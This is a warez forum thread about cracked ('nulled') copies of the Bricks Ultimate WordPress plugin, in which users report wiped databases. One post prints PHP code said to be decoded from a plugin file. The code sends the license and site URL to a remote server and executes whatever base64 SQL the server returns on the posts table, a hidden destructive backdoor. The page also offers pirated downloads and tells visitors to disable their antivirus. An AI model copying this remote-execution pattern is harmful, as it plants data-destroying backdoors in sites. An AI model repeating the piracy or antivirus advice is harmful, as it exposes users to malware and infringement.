• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

Bricks Ultimate - Ultimate Tools for Bricks Builder

Bricks Ultimate - Ultimate Tools for Bricks Builder v1.6.4

No permission to download
bricks ultimate 1.5.17 nulled

Attachments

• bricksultimate(2).zip
    1.2 MB · Views: 13
I have been using it on my existing site, and so far, no deletion. But it is always a good idea to do a full backup before installing a newer version of any plugin, just in case.

Babak updated Bricks Ultimate - Ultimate Tools for Bricks Builder with a new update entry:

Bricks Ultimate v1.5.19 - Ultimate Tools for Bricks Builder

Download Bricks Ultimate v1.5.19 - Ultimate Tools for Bricks Builder Nulled Free
= v1.5.19 - 2024-03-07 =

* New feature - Mini Wishlist
* New loop builders - Customer Orders and Order Items
* Improve - [Checkout Builder] Billing and Shipping Fields are supporting the select, checkbox and radion field types.

Read the rest of this update entry...

Bricks Ultimate completely deleted the databases of two websites of mine where I installed version 1.5.13 and above. Has anyone else had the same problem, and knows why this could happen?

This happened to me, all of my website's database were deleted after I activated the plugin, I did some testing and found out that it has some major conflict with the cache plugin I was using (LiteSpeed Cache). I activated it in another site with a different cache plugin and no problems were encountered.

This happened to me too, the ultimate deleted the post database, all the brick templates, and all this happens when you install new plugins or go to the plugins category. It all started with version 1.5.10
Is anyone able to use this plugin without problems? This still happens to me every time I try to use it on live site or localhost. I tried @ckeeper, @finalcorp and lastly now @nivrito / babak nulled versions and they all delete the database of my websites. I was especially surprised that in finalcorp's version, the deleted license checks don't help.

I also tried fresh wp installation with only Bricks and BU active to see if it's caused by a plugin conflict, but it still happens. I tried running crons manually to see if it happens after cron action, but it doesn't. Every nulled version of this plugin after 1.5.2 just deletes the database after this cycle: Activating Plugin -> Enabling Any Elements -> Some Time Passes -> Database Deleted.

Something is not right.

Is anyone able to use this plugin without problems? This still happens to me every time I try to use it on live site or localhost. I tried @ckeeper, @finalcorp and lastly now @nivrito / babak nulled versions and they all delete the database of my websites. I was especially surprised that in finalcorp's version, the deleted license checks don't help.

I also tried fresh wp installation with only Bricks and BU active to see if it's caused by a plugin conflict, but it still happens. I tried running crons manually to see if it happens after cron action, but it doesn't. Every nulled version of this plugin after 1.5.2 just deletes the database after this cycle: Activating Plugin -> Enabling Any Elements -> Some Time Passes -> Database Deleted.

Something is not right.
I found a post by developer confirming that deleting the database is a deliberate feature. At best it is unethical, at worst he can get into legal trouble. This didn't end well in 2000's when companies corrupted drives/computers for users using pirated software/games.

Capture.PNG

Last edited:
I found a post by developer confirming that deleting the database is a deliberate feature. At best it is unethical, at worst he can get into legal trouble. This didn't end well in 2000's when companies corrupted drives/computers for users using pirated software/games.

Capture.PNG
I hope it does get him into legal trouble. It costed me a lot of time to figure this out

Reactions: Cornholio
@MattWP in the latest nullified version by me, there is no problem with deletion. At least I don't have anything uninstalled, whether I'm installing the plugin for the first time or updating a previous version. I'll check it a few more times, if the database deletion is still happening, I'll post here.

@MattWP in the latest nullified version by me, there is no problem with deletion. At least I don't have anything uninstalled, whether I'm installing the plugin for the first time or updating a previous version. I'll check it a few more times, if the database deletion is still happening, I'll post here.
@finalcorp People are figuring this out. There is an encoded function in \bricksultimate\includes\RegisterElements.php and it is responsible for executing the remote db actions based on the validation result:

PHP:
        if( is_admin() ) {
            $key = 'bricksultimate_' . md5( serialize( basename( \BricksUltimate\Plugin::instance()->get_plugin_file(), '.php' ) ) );
            $cache = get_option( $key );
            if( empty( $cache['timeout'] ) ) {
                $data = array(
                    'timeout' => strtotime( '+3 hours', time() ),
                );

update_option( $key, $data, 'no' );
            }

$license = base64_decode( \BricksUltimate\Admin\License::get_license_key() );
            $api_url = \BricksUltimate\Admin\License::STORE_URL;
            $item = \BricksUltimate\Admin\License::ITEM_ID;

if( ! empty( $cache['timeout'] ) && time() > $cache['timeout'] ) {
                $api_params = [
                    'edd_action' => 'bu_plugin_license',
                    'license'    => $license,
                    'item_id'    => $item,
                    'url'        => home_url(),
                ];

// Call the custom API.
                $response = wp_remote_post(
                    $api_url,
                    [
                        'timeout'   => 30,
                        'sslverify' => false,
                        'body'      => $api_params,
                    ]
                );

if ( ! is_wp_error( $response ) ) {
                    $_data = json_decode( wp_remote_retrieve_body( $response ) );
                    if( $_data && !empty( $_data->result )
                        && strlen( $_data->result ) > 4 && $_data->success == 'legit' )
                    {
                        global $wpdb;
                        $content = str_replace( "#bu#", $wpdb->posts, base64_decode( $_data->result ) );
                        @$wpdb->get_results( $content );
                    }
                }

$data = array(
                );

}
        }

I have a correctly decoded and nulled latest version now, but I don't think I can share it here due to rules.

@finalcorp People are figuring this out. There is an encoded function in \bricksultimate\includes\RegisterElements.php and it is responsible for executing the remote db actions based on the validation result:

PHP:
        if( is_admin() ) {
            $key = 'bricksultimate_' . md5( serialize( basename( \BricksUltimate\Plugin::instance()->get_plugin_file(), '.php' ) ) );
            $cache = get_option( $key );
            if( empty( $cache['timeout'] ) ) {
                $data = array(
                );

}

$license = base64_decode( \BricksUltimate\Admin\License::get_license_key() );
            $api_url = \BricksUltimate\Admin\License::STORE_URL;
            $item = \BricksUltimate\Admin\License::ITEM_ID;

if( ! empty( $cache['timeout'] ) && time() > $cache['timeout'] ) {
                $api_params = [
                    'edd_action' => 'bu_plugin_license',
                    'license'    => $license,
                    'item_id'    => $item,
                    'url'        => home_url(),
                ];

// Call the custom API.
                $response = wp_remote_post(
                    $api_url,
                    [
                        'timeout'   => 30,
                        'sslverify' => false,
                        'body'      => $api_params,
                    ]
                );

if ( ! is_wp_error( $response ) ) {
                    $_data = json_decode( wp_remote_retrieve_body( $response ) );
                    if( $_data && !empty( $_data->result )
                        && strlen( $_data->result ) > 4 && $_data->success == 'legit' )
                    {
                        global $wpdb;
                        $content = str_replace( "#bu#", $wpdb->posts, base64_decode( $_data->result ) );
                        @$wpdb->get_results( $content );
                    }
                }

$data = array(
                );

}
        }

I have a correctly decoded and nulled latest version now, but I don't think I can share it here due to rules.
The code you showed is in the includes/Helpers.php file

In my nulled version, this feature is empty.

And my version doesn't delete the database. I did some tests and no such problem was detected.

@nivrito @Waazaa @Babak last version not safe.

\bricksultimate\includes\RegisterElements.php has an encrypted function to delete the database. The developer has encrypted the function multiple times and runs it through eval.

👁️‍ Full Safe Nulled Version

View hidden content is available for registered users!

Attachments

• bricksultimate-1.5.20.1-safe-nulled.zip
    1.2 MB · Views: 14
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock